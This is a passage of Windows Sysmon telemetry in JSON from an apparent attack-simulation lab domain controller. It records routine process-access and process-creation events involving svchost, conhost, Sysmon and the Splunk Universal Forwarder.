C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:51.619","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6522,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:51.619\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:51.619","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6523,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:51.619\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:51.619","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6524,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:51.619\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:51.619","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6525,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:51.619\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-045F-5F25-0000-001057600C00}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:51.619","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-045F-5F25-0000-001057600C00}","TargetProcessId":"4748","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6526,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:53.058\r\nProcessGuid: {A837DB8D-0461-5F25-0000-001061620C00}\r\nProcessId: 4812\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:57:53.058","ProcessGuid":"{A837DB8D-0461-5F25-0000-001061620C00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:57:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6527,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:53.057\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0461-5F25-0000-001061620C00}\r\nTargetProcessId: 4812\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:53.057","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0461-5F25-0000-001061620C00}","TargetProcessId":"4812","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6528,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:53.057\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0461-5F25-0000-001061620C00}\r\nTargetProcessId: 4812\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:53.057","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0461-5F25-0000-001061620C00}","TargetProcessId":"4812","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6529,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:53.057\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:53.057","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
